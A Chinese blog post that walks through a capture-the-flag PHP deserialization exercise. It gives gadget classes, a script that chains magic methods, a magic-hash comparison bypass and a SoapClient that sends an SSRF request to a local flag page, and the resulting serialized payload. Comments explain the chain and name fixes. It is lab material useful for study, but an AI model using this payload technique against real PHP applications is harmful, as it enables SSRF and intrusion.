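什么是soap [SoapClient原生类在开发以及安全中利用-CSDN博客](https://blog.csdn.net/qq_38154820/article/details/119952852)

启动soap模块 [php中soapClient如何配置 - 顾遥 - 博客园 (cnblogs.com)](https://www.cnblogs.com/ljy9631/articles/9149400.html)

例题W4terCTF-2023:deser-plus:

```php
<?php
// Gadget classes for the W4terCTF-2023 "deser-plus" exercise, followed by the
// script that builds the object graph and prints its serialized form.
//
// Review notes for whoever owns code shaped like this:
//   * The whole chain depends on unserialize() being fed attacker-controlled
//     bytes. Decoding with json_decode(), or calling
//     unserialize($data, ['allowed_classes' => false]), removes the entry point.
//   * A SoapClient inside an unserialize() graph is an SSRF primitive: any
//     undefined method called on it is turned into an HTTP request to its
//     'location' (see the note on C::uwant()).

class A
{
    public $a;
    public $b;

    // Runs on unserialize() and overwrites $a.
    public function __wakeup()
    {
        $this->a = "hacker?";
    }

    // Runs when the object is called like a function.
    public function __invoke()
    {
        // Loose `==` between two numeric-looking strings compares them as
        // numbers, so a value of the form 0e<digits> whose MD5 is also
        // 0e<digits> satisfies this check. `===` or hash_equals() would not.
        if (isset($this->a) && $this->a == md5($this->a)) {
            $this->b->uwant();
        }
    }
}

class B
{
    public $a;
    public $b;
    public $k;

    // Copies $k into $b, then passes $a to die(); if $a is an object, die()
    // converts it to a string and so reaches its __toString().
    function __destruct()
    {
        $this->b = $this->k;
        die($this->a);
    }
}

class C
{
    public $a;
    public $c;

    // Calls $c as a callable and returns the result; an object stored in $c
    // has its __invoke() run here.
    public function __toString()
    {
        $cc = $this->c;
        return $cc();
    }

    public function uwant()
    {
        if ($this->a == "phpinfo") {
            phpinfo();
        } else {
            // Calls a method that $a does not define. When $a is a SoapClient,
            // the call goes through SoapClient::__call() and is sent as a SOAP
            // request to the client's 'location'.
            $this->a->unexist_function();
        }
    }
}

$a = new A();
$b = new B();
$c1 = new C();
$c2 = new C();

// B::$b is bound by reference to A::$a, so the `$this->b = $this->k` assignment
// in B::__destruct() also writes A::$a, after A::__wakeup() has already run.
$b->b = &$a->a;
$b->k = "0e215962017";

$b->a = $c1; // B::__destruct() -> C::__toString()
$c1->c = $a; // C::__toString() -> A::__invoke()

// Non-WSDL mode: the first argument is null and 'location' / 'uri' are given
// explicitly.
$c2->a = new SoapClient(null, [
    'location' => 'http://127.0.0.1/flag.php',
    'uri' => 'http://127.0.0.1/flag.php',
]);
$a->b = $c2; // A::__invoke() -> C::uwant()

// NOTE(review): B::__destruct() also runs when this script itself finishes, so
// the same chain fires on the machine that generates the string.
echo serialize($b);

// Output recorded by the author. NOTE(review): the SoapClient property list
// may differ between PHP versions - regenerate rather than copy.
//O:1:"B":3:{s:1:"a";O:1:"C":2:{s:1:"a";N;s:1:"c";O:1:"A":2:{s:1:"a";N;s:1:"b";O:1:"C":2:{s:1:"a";O:10:"SoapClient":4:{s:3:"uri";s:25:"http://127.0.0.1/flag.php";s:8:"location";s:25:"http://127.0.0.1/flag.php";s:15:"_stream_context";i:0;s:13:"_soap_version";i:1;}s:1:"c";N;}}}s:1:"b";R:5;s:1:"k";s:11:"0e215962017";}
?>
```

最后修改:2024 年 01 月 05 日 © 允许规范转载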